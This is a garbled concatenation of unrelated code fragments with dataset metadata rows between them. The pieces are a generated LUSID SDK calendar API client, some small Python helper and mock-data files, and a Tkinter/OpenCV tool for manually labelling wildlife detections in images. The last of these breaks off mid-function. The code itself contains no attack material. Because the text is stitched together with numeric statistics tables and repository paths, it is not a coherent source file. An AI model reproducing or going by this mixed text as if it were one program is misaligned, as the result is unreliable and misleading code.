if ('scope' in local_var_params and
len(local_var_params['scope']) < 1):
raise ApiValueError("Invalid value for parameter `scope` when calling `list_calendars_in_scope`, length must be greater than or equal to `1`") # noqa: E501
if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `list_calendars_in_scope`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if ('page' in local_var_params and
len(local_var_params['page']) > 500):
raise ApiValueError("Invalid value for parameter `page` when calling `list_calendars_in_scope`, length must be less than or equal to `500`") # noqa: E501
if ('page' in local_var_params and
len(local_var_params['page']) < 1):
raise ApiValueError("Invalid value for parameter `page` when calling `list_calendars_in_scope`, length must be greater than or equal to `1`") # noqa: E501
if 'page' in local_var_params and not re.search(r'^[a-zA-Z0-9\+\/]*={0,3}$', local_var_params['page']): # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `list_calendars_in_scope`, must conform to the pattern `/^[a-zA-Z0-9\+\/]*={0,3}$/`") # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] > 5000: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `list_calendars_in_scope`, must be a value less than or equal to `5000`") # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `list_calendars_in_scope`, must be a value greater than or equal to `1`") # noqa: E501
if ('filter' in local_var_params and
len(local_var_params['filter']) > 2147483647):
raise ApiValueError("Invalid value for parameter `filter` when calling `list_calendars_in_scope`, length must be less than or equal to `2147483647`") # noqa: E501
if ('filter' in local_var_params and
len(local_var_params['filter']) < 0):
raise ApiValueError("Invalid value for parameter `filter` when calling `list_calendars_in_scope`, length must be greater than or equal to `0`") # noqa: E501
if 'filter' in local_var_params and not re.search(r'^[\s\S]*$', local_var_params['filter']): # noqa: E501
raise ApiValueError("Invalid value for parameter `filter` when calling `list_calendars_in_scope`, must conform to the pattern `/^[\s\S]*$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
query_params = []
if 'as_at' in local_var_params:
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'start' in local_var_params:
query_params.append(('start', local_var_params['start'])) # noqa: E501
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'filter' in local_var_params:
query_params.append(('filter', local_var_params['filter'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3192'
return self.api_client.call_api(
'/api/calendars/generic/{scope}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagedResourceListOfCalendar', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_calendar(self, scope, code, update_calendar_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Update a calendar # noqa: E501
Update the calendars WeekendMask, SourceProvider or Properties # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_calendar(scope, code, update_calendar_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the request (required)
:param str code: Code of the request (required)
:param UpdateCalendarRequest update_calendar_request: The new state of the calendar (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Calendar
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_calendar_with_http_info(scope, code, update_calendar_request, **kwargs) # noqa: E501
def update_calendar_with_http_info(self, scope, code, update_calendar_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Update a calendar # noqa: E501
Update the calendars WeekendMask, SourceProvider or Properties # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_calendar_with_http_info(scope, code, update_calendar_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the request (required)
:param str code: Code of the request (required)
:param UpdateCalendarRequest update_calendar_request: The new state of the calendar (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Calendar, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['scope', 'code', 'update_calendar_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_calendar" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'scope' is set
if ('scope' not in local_var_params or
local_var_params['scope'] is None):
raise ApiValueError("Missing the required parameter `scope` when calling `update_calendar`") # noqa: E501
# verify the required parameter 'code' is set
if ('code' not in local_var_params or
local_var_params['code'] is None):
raise ApiValueError("Missing the required parameter `code` when calling `update_calendar`") # noqa: E501
# verify the required parameter 'update_calendar_request' is set
if ('update_calendar_request' not in local_var_params or
local_var_params['update_calendar_request'] is None):
raise ApiValueError("Missing the required parameter `update_calendar_request` when calling `update_calendar`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) > 64):
raise ApiValueError("Invalid value for parameter `scope` when calling `update_calendar`, length must be less than or equal to `64`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) < 1):
raise ApiValueError("Invalid value for parameter `scope` when calling `update_calendar`, length must be greater than or equal to `1`") # noqa: E501
if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `update_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) > 64):
raise ApiValueError("Invalid value for parameter `code` when calling `update_calendar`, length must be less than or equal to `64`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) < 1):
raise ApiValueError("Invalid value for parameter `code` when calling `update_calendar`, length must be greater than or equal to `1`") # noqa: E501
if 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `update_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'update_calendar_request' in local_var_params:
body_params = local_var_params['update_calendar_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3192'
return self.api_client.call_api(
'/api/calendars/generic/{scope}/{code}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Calendar', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 56.690652
| 553
| 0.629699
| 10,516
| 84,299
| 4.841385
| 0.030905
| 0.053111
| 0.087445
| 0.037398
| 0.978414
| 0.97368
| 0.968279
| 0.962877
| 0.955256
| 0.949933
| 0
| 0.020644
| 0.283432
| 84,299
| 1,486
| 554
| 56.728802
| 0.822187
| 0.391772
| 0
| 0.722656
| 1
| 0.083333
| 0.323011
| 0.065881
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027344
| false
| 0
| 0.00651
| 0
| 0.061198
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
745ab8eceda81d4f587ebf21c5db2d4abf2f342f
| 108
|
py
|
Python
|
ChromProcess/Loading/experiment_conditions/__init__.py
|
Will-Robin/ChromProcess
|
05f57a4344e58f844ff8a01a12cf9e47afe4fcc4
|
[
"BSD-3-Clause"
] | null | null | null |
ChromProcess/Loading/experiment_conditions/__init__.py
|
Will-Robin/ChromProcess
|
05f57a4344e58f844ff8a01a12cf9e47afe4fcc4
|
[
"BSD-3-Clause"
] | 1
|
2022-01-21T16:14:05.000Z
|
2022-01-21T16:14:05.000Z
|
ChromProcess/Loading/experiment_conditions/__init__.py
|
Will-Robin/ChromProcess
|
05f57a4344e58f844ff8a01a12cf9e47afe4fcc4
|
[
"BSD-3-Clause"
] | 1
|
2022-01-18T16:17:05.000Z
|
2022-01-18T16:17:05.000Z
|
from .conditions_from_csv import conditions_from_csv
from .conditions_from_toml import conditions_from_toml
| 36
| 54
| 0.907407
| 16
| 108
| 5.625
| 0.3125
| 0.622222
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 108
| 2
| 55
| 54
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
77a4c8c7d77e149ca7fe1824a72b9b02b59a1ba2
| 248
|
py
|
Python
|
dcm_spec_tools/tests/test_utils.py
|
mrbean-bremen/dicom-validator
|
56a6b57346e61e578589143d2752c4fd3f562dfb
|
[
"MIT"
] | 5
|
2016-12-09T03:30:33.000Z
|
2019-07-01T14:06:02.000Z
|
dcm_spec_tools/tests/test_utils.py
|
mrbean-bremen/dicom-validator
|
56a6b57346e61e578589143d2752c4fd3f562dfb
|
[
"MIT"
] | 3
|
2018-04-23T07:16:16.000Z
|
2021-01-24T18:13:48.000Z
|
dcm_spec_tools/tests/test_utils.py
|
mrbean-bremen/dicom-validator
|
56a6b57346e61e578589143d2752c4fd3f562dfb
|
[
"MIT"
] | null | null | null |
import os
def fixture_path():
return os.path.join(os.path.dirname(__file__), 'fixtures')
def spec_fixture_path():
return os.path.join(fixture_path(), 'docbook')
def json_fixture_path():
return os.path.join(fixture_path(), 'json')
| 17.714286
| 62
| 0.705645
| 36
| 248
| 4.555556
| 0.361111
| 0.335366
| 0.310976
| 0.347561
| 0.628049
| 0.628049
| 0.463415
| 0.463415
| 0
| 0
| 0
| 0
| 0.141129
| 248
| 13
| 63
| 19.076923
| 0.769953
| 0
| 0
| 0
| 0
| 0
| 0.076613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| true
| 0
| 0.142857
| 0.428571
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
77d5e9a71a84b9acb2b370f502e835e0ed42cb1e
| 110
|
py
|
Python
|
rlschool/metamaze/envs/__init__.py
|
HaojieSHI98/RLSchool
|
23c21c8028c8398a94dd7ed7aeb2624dc72f1160
|
[
"Apache-2.0"
] | 169
|
2019-07-15T02:23:54.000Z
|
2021-10-31T08:31:19.000Z
|
rlschool/metamaze/envs/__init__.py
|
HaojieSHI98/RLSchool
|
23c21c8028c8398a94dd7ed7aeb2624dc72f1160
|
[
"Apache-2.0"
] | 23
|
2019-07-22T05:11:13.000Z
|
2021-11-01T04:53:39.000Z
|
rlschool/metamaze/envs/__init__.py
|
HaojieSHI98/RLSchool
|
23c21c8028c8398a94dd7ed7aeb2624dc72f1160
|
[
"Apache-2.0"
] | 48
|
2019-07-15T02:21:42.000Z
|
2021-09-16T06:40:51.000Z
|
from rlschool.metamaze.envs.maze_env import MetaMaze3D
from rlschool.metamaze.envs.maze_env import MetaMaze2D
| 36.666667
| 54
| 0.872727
| 16
| 110
| 5.875
| 0.5625
| 0.255319
| 0.425532
| 0.510638
| 0.787234
| 0.787234
| 0.787234
| 0
| 0
| 0
| 0
| 0.019608
| 0.072727
| 110
| 2
| 55
| 55
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
77f492600a33570411c1e0d070d99a7237100357
| 5,546
|
py
|
Python
|
pyramid_scaffold/sample_data/__init__.py
|
austincmatteson/pyramid-stocks
|
662a90588db12cf30d59f43278a716fee63d5f74
|
[
"MIT"
] | null | null | null |
pyramid_scaffold/sample_data/__init__.py
|
austincmatteson/pyramid-stocks
|
662a90588db12cf30d59f43278a716fee63d5f74
|
[
"MIT"
] | 3
|
2019-12-26T16:42:54.000Z
|
2021-06-01T22:23:24.000Z
|
pyramid_scaffold/sample_data/__init__.py
|
austincmatteson/pyramid-stocks
|
662a90588db12cf30d59f43278a716fee63d5f74
|
[
"MIT"
] | null | null | null |
MOCK_ENTRIES = [{
"symbol": "GE",
"companyName": "General Electric Company",
"exchange": "New York Stock Exchange",
"industry": "Industrial Products",
"website": "http://www.ge.com",
"description":
"General Electric Co is a digital industrial company. It operates"
" in various segments, including power and water, oil and gas,"
" energy management, aviation, healthcare, transportation,"
" appliances and lighting, and more.",
"CEO": "John L. Flannery",
"issueType": "cs",
"sector": "Industrials"
}, {
"symbol": "JE",
"companyName": "General Electric Company",
"exchange": "New York Stock Exchange",
"industry": "Industrial Products",
"website": "http://www.ge.com",
"description":
"General Electric Co is a digital industrial company. It operates"
" in various segments, including power and water, oil and gas,"
" energy management, aviation, healthcare, transportation,"
" appliances and lighting, and more.",
"CEO": "John L. Flannery",
"issueType": "cs",
"sector": "Industrials"
}, {
"symbol": "KE",
"companyName": "General Electric Company",
"exchange": "New York Stock Exchange",
"industry": "Industrial Products",
"website": "http://www.ge.com",
"description":
"General Electric Co is a digital industrial company. It operates"
" in various segments, including power and water, oil and gas,"
" energy management, aviation, healthcare, transportation,"
" appliances and lighting, and more.",
"CEO": "John L. Flannery",
"issueType": "cs",
"sector": "Industrials"
}, {
"symbol": "AE",
"companyName": "General Electric Company",
"exchange": "New York Stock Exchange",
"industry": "Industrial Products",
"website": "http://www.ge.com",
"description":
"General Electric Co is a digital industrial company. It operates"
" in various segments, including power and water, oil and gas,"
" energy management, aviation, healthcare, transportation,"
" appliances and lighting, and more.",
"CEO": "John L. Flannery",
"issueType": "cs",
"sector": "Industrials"
}, {
"symbol": "BE",
"companyName": "General Electric Company",
"exchange": "New York Stock Exchange",
"industry": "Industrial Products",
"website": "http://www.ge.com",
"description":
"General Electric Co is a digital industrial company. It operates"
" in various segments, including power and water, oil and gas,"
" energy management, aviation, healthcare, transportation,"
" appliances and lighting, and more.",
"CEO": "John L. Flannery",
"issueType": "cs",
"sector": "Industrials"
}, {
"symbol": "CE",
"companyName": "General Electric Company",
"exchange": "New York Stock Exchange",
"industry": "Industrial Products",
"website": "http://www.ge.com",
"description":
"General Electric Co is a digital industrial company. It operates"
" in various segments, including power and water, oil and gas,"
" energy management, aviation, healthcare, transportation,"
" appliances and lighting, and more.",
"CEO": "John L. Flannery",
"issueType": "cs",
"sector": "Industrials"
}, {
"symbol": "DE",
"companyName": "General Electric Company",
"exchange": "New York Stock Exchange",
"industry": "Industrial Products",
"website": "http://www.ge.com",
"description":
"General Electric Co is a digital industrial company. It operates"
" in various segments, including power and water, oil and gas,"
" energy management, aviation, healthcare, transportation,"
" appliances and lighting, and more.",
"CEO": "John L. Flannery",
"issueType": "cs",
"sector": "Industrials"
}, {
"symbol": "EE",
"companyName": "General Electric Company",
"exchange": "New York Stock Exchange",
"industry": "Industrial Products",
"website": "http://www.ge.com",
"description":
"General Electric Co is a digital industrial company. It operates"
" in various segments, including power and water, oil and gas,"
" energy management, aviation, healthcare, transportation,"
" appliances and lighting, and more.",
"CEO": "John L. Flannery",
"issueType": "cs",
"sector": "Industrials"
}, {
"symbol": "FE",
"companyName": "General Electric Company",
"exchange": "New York Stock Exchange",
"industry": "Industrial Products",
"website": "http://www.ge.com",
"description":
"General Electric Co is a digital industrial company. It operates"
" in various segments, including power and water, oil and gas,"
" energy management, aviation, healthcare, transportation,"
" appliances and lighting, and more.",
"CEO": "John L. Flannery",
"issueType": "cs",
"sector": "Industrials"
}, {
"symbol": "HE",
"companyName": "General Electric Company",
"exchange": "New York Stock Exchange",
"industry": "Industrial Products",
"website": "http://www.ge.com",
"description":
"General Electric Co is a digital industrial company. It operates"
" in various segments, including power and water, oil and gas,"
" energy management, aviation, healthcare, transportation,"
" appliances and lighting, and more.",
"CEO": "John L. Flannery",
"issueType": "cs",
"sector": "Industrials"
}]
| 39.056338
| 74
| 0.62784
| 582
| 5,546
| 5.9811
| 0.103093
| 0.086182
| 0.074691
| 0.0948
| 0.989371
| 0.989371
| 0.989371
| 0.989371
| 0.989371
| 0.989371
| 0
| 0
| 0.231158
| 5,546
| 141
| 75
| 39.333333
| 0.81637
| 0
| 0
| 0.914894
| 0
| 0
| 0.721241
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bb0ec314df060a714405a1b0859235dc8e53699d
| 13,733
|
py
|
Python
|
src/postprocess/display_output.py
|
CMFell/phd_cnn_code
|
cb343bc379f5b06241cead64089a41ae5a6fe167
|
[
"MIT"
] | null | null | null |
src/postprocess/display_output.py
|
CMFell/phd_cnn_code
|
cb343bc379f5b06241cead64089a41ae5a6fe167
|
[
"MIT"
] | null | null | null |
src/postprocess/display_output.py
|
CMFell/phd_cnn_code
|
cb343bc379f5b06241cead64089a41ae5a6fe167
|
[
"MIT"
] | null | null | null |
import cv2
import os
import numpy as np
import pandas as pd
from pathlib import Path
from PIL import Image, ImageTk
import tkinter as tk
def display_single_image_results(image_in, image_filename, res_list):
# Create a window
window = tk.Tk()
window.title(Path(image_filename).stem)
# Get the image dimensions
height, width, no_channels = image_in.shape
image_in = cv2.cvtColor(image_in, cv2.COLOR_BGR2RGB)
height_sm = int(height / 8)
width_sm = int(width / 8)
image_sm = cv2.resize(image_in, (width_sm, height_sm))
res_string = f'This image contains {res_list[0]} true positives in green, {res_list[1]} false positives in yellow and {res_list[2]} false negatives in red'
img_string = f'This image is saved at {res_list[4]}'
csv_string = f'The box locations are saved at {res_list[3]}'
# add text to canvas
label1 = tk.Label(window, text=res_string)
label1.pack()
label2 = tk.Label(window, text=img_string)
label2.pack()
label3 = tk.Label(window, text=csv_string)
label3.pack()
# Create a canvas that can fit the above image
canvas = tk.Canvas(window, width = width_sm, height = height_sm)
canvas.pack()
# Convert to a PhotoImage
photo = ImageTk.PhotoImage(image = Image.fromarray(image_sm))
# Add a PhotoImage to the Canvas
canvas.create_image(0, 0, image=photo, anchor=tk.NW)
# Run the window loop
window.mainloop()
def manual_check_single_image(results_loc, image_output_loc):
root = tk.Tk()
# size of the window
root.geometry("400x300")
app = CheckDetectionWindowsSingleImage(results_loc, image_output_loc, root)
root.mainloop()
class CheckDetectionWindows(tk.Frame):
def __init__(self, results_path, imagedir, master=None):
tk.Frame.__init__(self, master)
self.master = master
self.results_path = results_path
gfrc_results = pd.read_csv(self.results_path)
self.gfrc_results_sort = gfrc_results.sort_values(by='filename')
if 'checked' not in self.gfrc_results_sort.columns:
self.gfrc_results_sort['checked'] = np.zeros(self.gfrc_results_sort.shape[0])
if 'manual_result' not in self.gfrc_results_sort.columns:
self.gfrc_results_sort['manual_result'] = np.repeat("", self.gfrc_results_sort.shape[0])
self.pos_folder = imagedir + 'pos/'
self.neg_folder = imagedir + 'neg/'
self.init_window()
# Creation of init_window
def init_window(self):
self.imagefile = ""
self.rowimage = None
self.idx = int(np.sum(self.gfrc_results_sort['checked']))
row = self.gfrc_results_sort.iloc[self.idx, :]
rowimagefile = row.filename
if rowimagefile != self.imagefile:
rowpath = self.pos_folder + rowimagefile
if not os.path.isfile(rowpath):
rowpath = self.neg_folder + rowimagefile
rowimage = cv2.imread(rowpath)
self.rowimage = cv2.cvtColor(rowimage, cv2.COLOR_BGR2RGB)
self.imagefile = rowimagefile
rowxmn = max(0, row.xmn - 25)
rowxmx = min(7360, row.xmx + 25)
rowymn = max(0, row.ymn - 25)
rowymx = min(4912, row.ymx + 25)
rowwindow = self.rowimage[rowymn:rowymx, rowxmn:rowxmx, :]
load = Image.fromarray(rowwindow)
render = ImageTk.PhotoImage(load)
# labels can be text or images
self.imgwindow = tk.Label(self, image=render)
self.imgwindow.image = render
self.imgwindow.place(x=0, y=0)
# changing the title of our master widget
self.master.title(self.imagefile)
# allowing the widget to take the full space of the root window
self.pack(fill=tk.BOTH, expand=1)
# creating a button instance
AnimalButton = tk.Button(self, text="Animal", command=self.onClickAnimal)
NotAnimalButton = tk.Button(self, text="Not Animal", command=self.onClickNot)
SaveButton = tk.Button(self, text="Save", command=self.onClickSave)
BackButton = tk.Button(self, text="Back", command=self.onClickBack)
# placing the button on my window
AnimalButton.place(x=0, y=250)
NotAnimalButton.place(x=75, y=250)
SaveButton.place(x=150, y=250)
BackButton.place(x=225, y=250)
def onClickAnimal(self):
# update details
self.gfrc_results_sort['checked'].iloc[self.idx] = 1
self.gfrc_results_sort['manual_result'].iloc[self.idx] = "Animal"
self.idx = self.idx + 1
self.imgwindow.config(image="")
row = self.gfrc_results_sort.iloc[self.idx, :]
rowimagefile = row.filename
if rowimagefile != self.imagefile:
rowpath = self.pos_folder + rowimagefile
if not os.path.isfile(rowpath):
rowpath = self.neg_folder + rowimagefile
rowimage = cv2.imread(rowpath)
self.rowimage = cv2.cvtColor(rowimage, cv2.COLOR_BGR2RGB)
self.imagefile = rowimagefile
rowxmn = max(0, row.xmn - 25)
rowxmx = min(7360, row.xmx + 25)
rowymn = max(0, row.ymn - 25)
rowymx = min(4912, row.ymx + 25)
rowwindow = self.rowimage[rowymn:rowymx, rowxmn:rowxmx, :]
load = Image.fromarray(rowwindow)
render = ImageTk.PhotoImage(load)
# labels can be text or images
self.imgwindow = tk.Label(self, image=render)
self.imgwindow.image = render
self.imgwindow.place(x=0, y=0)
# changing the title of our master widget
self.master.title(self.imagefile)
def onClickNot(self):
# update details
self.gfrc_results_sort['checked'].iloc[self.idx] = 1
self.gfrc_results_sort['manual_result'].iloc[self.idx] = "Not_Animal"
self.idx = self.idx + 1
self.imgwindow.config(image="")
row = self.gfrc_results_sort.iloc[self.idx, :]
rowimagefile = row.filename
if rowimagefile != self.imagefile:
rowpath = self.pos_folder + rowimagefile
if not os.path.isfile(rowpath):
rowpath = self.neg_folder + rowimagefile
rowimage = cv2.imread(rowpath)
self.rowimage = cv2.cvtColor(rowimage, cv2.COLOR_BGR2RGB)
self.imagefile = rowimagefile
rowxmn = max(0, row.xmn - 25)
rowxmx = min(7360, row.xmx + 25)
rowymn = max(0, row.ymn - 25)
rowymx = min(4912, row.ymx + 25)
rowwindow = self.rowimage[rowymn:rowymx, rowxmn:rowxmx, :]
load = Image.fromarray(rowwindow)
render = ImageTk.PhotoImage(load)
# labels can be text or images
self.imgwindow = tk.Label(self, image=render)
self.imgwindow.image = render
self.imgwindow.place(x=0, y=0)
# changing the title of our master widget
self.master.title(self.imagefile)
def onClickSave(self):
self.gfrc_results_sort.to_csv(self.results_path, index=False)
def onClickBack(self):
# update details
self.idx = self.idx - 1
self.gfrc_results_sort['checked'].iloc[self.idx] = 0
self.gfrc_results_sort['manual_result'].iloc[self.idx] = ""
self.imgwindow.config(image="")
row = self.gfrc_results_sort.iloc[self.idx, :]
rowimagefile = row.filename
if rowimagefile != self.imagefile:
rowpath = self.pos_folder + rowimagefile
if not os.path.isfile(rowpath):
rowpath = self.neg_folder + rowimagefile
rowimage = cv2.imread(rowpath)
self.rowimage = cv2.cvtColor(rowimage, cv2.COLOR_BGR2RGB)
self.imagefile = rowimagefile
rowxmn = max(0, row.xmn - 25)
rowxmx = min(7360, row.xmx + 25)
rowymn = max(0, row.ymn - 25)
rowymx = min(4912, row.ymx + 25)
rowwindow = self.rowimage[rowymn:rowymx, rowxmn:rowxmx, :]
load = Image.fromarray(rowwindow)
render = ImageTk.PhotoImage(load)
# labels can be text or images
self.imgwindow = tk.Label(self, image=render)
self.imgwindow.image = render
self.imgwindow.place(x=0, y=0)
# changing the title of our master widget
self.master.title(self.imagefile)
class CheckDetectionWindowsSingleImage(tk.Frame):
def __init__(self, results_path, image_path, master=None):
tk.Frame.__init__(self, master)
self.master = master
self.results_path = results_path
self.gfrc_results = pd.read_csv(self.results_path)
if 'checked' not in self.gfrc_results.columns:
self.gfrc_results['checked'] = np.zeros(self.gfrc_results.shape[0])
if 'manual_result' not in self.gfrc_results.columns:
self.gfrc_results['manual_result'] = np.repeat("", self.gfrc_results.shape[0])
image = cv2.imread(image_path)
self.image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
self.init_window()
# Creation of init_window
def init_window(self):
self.idx = int(np.sum(self.gfrc_results['checked']))
if self.idx < self.gfrc_results.shape[0]:
row = self.gfrc_results.iloc[self.idx, :]
if row.confmat == 'FN':
print("no detections to check")
else:
rowxmn = max(0, row.xmn - 25)
rowxmx = min(7360, row.xmx + 25)
rowymn = max(0, row.ymn - 25)
rowymx = min(4912, row.ymx + 25)
rowwindow = self.image[rowymn:rowymx, rowxmn:rowxmx, :]
load = Image.fromarray(rowwindow)
render = ImageTk.PhotoImage(load)
# labels can be text or images
self.imgwindow = tk.Label(self, image=render)
self.imgwindow.image = render
self.imgwindow.place(x=0, y=0)
else:
print("no detections to check")
# changing the title of our master widget
self.master.title("Check Detections")
# allowing the widget to take the full space of the root window
self.pack(fill=tk.BOTH, expand=1)
# creating a button instance
AnimalButton = tk.Button(self, text="Animal", command=self.onClickAnimal)
NotAnimalButton = tk.Button(self, text="Not Animal", command=self.onClickNot)
SaveButton = tk.Button(self, text="Save", command=self.onClickSave)
BackButton = tk.Button(self, text="Back", command=self.onClickBack)
# placing the button on my window
AnimalButton.place(x=0, y=250)
NotAnimalButton.place(x=75, y=250)
SaveButton.place(x=150, y=250)
BackButton.place(x=225, y=250)
def onClickAnimal(self):
# update details
self.gfrc_results['checked'].iloc[self.idx] = 1
self.gfrc_results['manual_result'].iloc[self.idx] = "Animal"
self.idx = self.idx + 1
self.imgwindow.config(image="")
if self.idx < self.gfrc_results.shape[0]:
row = self.gfrc_results.iloc[self.idx, :]
if row.confmat == 'FN':
print("no more detections to check")
else:
rowxmn = max(0, row.xmn - 25)
rowxmx = min(7360, row.xmx + 25)
rowymn = max(0, row.ymn - 25)
rowymx = min(4912, row.ymx + 25)
rowwindow = self.image[rowymn:rowymx, rowxmn:rowxmx, :]
load = Image.fromarray(rowwindow)
render = ImageTk.PhotoImage(load)
# labels can be text or images
self.imgwindow = tk.Label(self, image=render)
self.imgwindow.image = render
self.imgwindow.place(x=0, y=0)
else:
print("no more detections to check")
def onClickNot(self):
# update details
self.gfrc_results['checked'].iloc[self.idx] = 1
self.gfrc_results['manual_result'].iloc[self.idx] = "Not_Animal"
self.idx = self.idx + 1
self.imgwindow.config(image="")
if self.idx < self.gfrc_results.shape[0]:
row = self.gfrc_results.iloc[self.idx, :]
if row.confmat == 'FN':
print("no more detections to check")
else:
rowxmn = max(0, row.xmn - 25)
